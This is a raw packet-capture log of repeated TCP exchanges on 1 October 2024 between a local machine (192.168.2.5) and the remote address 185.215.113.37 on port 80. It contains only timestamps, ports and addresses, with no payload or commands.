Oct 1, 2024 16:50:08.505707026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505717993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505728960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505738974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.505738974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.505774021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.505870104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505882025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505892038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505901098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505918026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.505953074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.505980968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.505994081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506006002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506016970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506045103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506045103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506136894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506165028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506176949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506186008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506196976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506202936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506207943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506213903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506217957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506227970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506238937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506248951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506256104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506267071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506275892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506278038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506304026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506304026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506314993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506325960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506336927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506345987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506350040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506350040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506357908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506371021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506382942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506392956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506392956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506392956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506412029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506422043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506423950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.506447077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.506491899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538203001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538233042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538244963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538255930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538268089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538279057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538290024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538301945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538312912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538317919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538324118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538336039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538345098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538357019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538367987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538378954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538389921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538400888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538400888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538605928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538616896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538629055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538649082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538649082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538707972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538718939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538722038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538729906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538741112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538775921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538775921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538851023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538861036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538896084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.538964033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.538975954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539031982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539031982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539036989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539048910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539060116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539071083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539083004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539098978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539098978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539120913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539133072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539143085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539151907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539161921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539164066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539164066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539174080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539201975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539201975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539336920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539347887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539360046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539364100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539390087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539392948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539392948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539401054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539412022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539422035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539427042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539433002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.539480925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.539480925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593477011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593499899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593513012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593523026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593534946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593549013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593552113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593564034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593579054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593579054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593591928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593602896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593614101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593624115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593633890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593640089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593640089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593652010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593663931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593668938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593673944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593683958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593688011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593694925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593707085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593719006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593720913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593732119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593740940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593751907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593756914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593764067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593775034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593808889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593808889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.593899012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593930960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593940020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.593962908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594034910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594046116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594060898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594072104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594083071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594099045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594119072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594119072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594152927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594309092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594322920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594333887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594351053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594352961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594363928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594407082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594407082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594577074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594589949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594609022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594619989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594630003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594640970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594650984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594655991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594655991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594664097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594675064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594695091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594702959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594705105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594705105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594711065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594718933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594721079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594724894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594727993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594734907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594748020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594788074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594788074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594806910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594824076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594834089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594845057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594856024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594858885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594887972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594909906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594913006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594922066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594933033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594944000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594952106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594955921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594973087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594984055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.594985962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594985962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.594995022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595007896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595019102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.595042944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.595060110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.595062017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595074892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595086098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595097065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595109940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.595149994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.595401049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595415115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595426083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.595455885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.595474958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.626744986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626764059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626775980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626795053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626806021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626816034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.626817942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626828909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626838923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626854897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626863003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.626863003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.626934052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626945972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626957893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.626977921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.626977921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627003908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627017021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627017975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627027988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627067089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627068043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627221107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627239943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627250910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627260923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627294064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627294064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627321005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627335072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627346992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627357960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627367020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.627401114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627401114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627435923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.627970934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628004074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628015041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628029108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628051043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628065109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628089905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628101110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628112078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628123045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628145933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628145933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628185987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628216028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628226995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628237009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628247976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628259897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628264904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628293037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628329992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628382921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628393888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628412008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628421068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628432035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628443003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628443956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628443956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628453016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628459930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628463984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628474951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628484011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.628511906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628511906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.628540993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682234049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682297945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682331085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682342052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682353020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682363987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682374954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682377100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682388067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682418108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682430983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682446957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682459116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682467937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682478905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682492018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682502031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682512045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682512045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682512999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682523966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682534933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682543993 CEST	80	49704	185.215.113.37	192.168.2.5
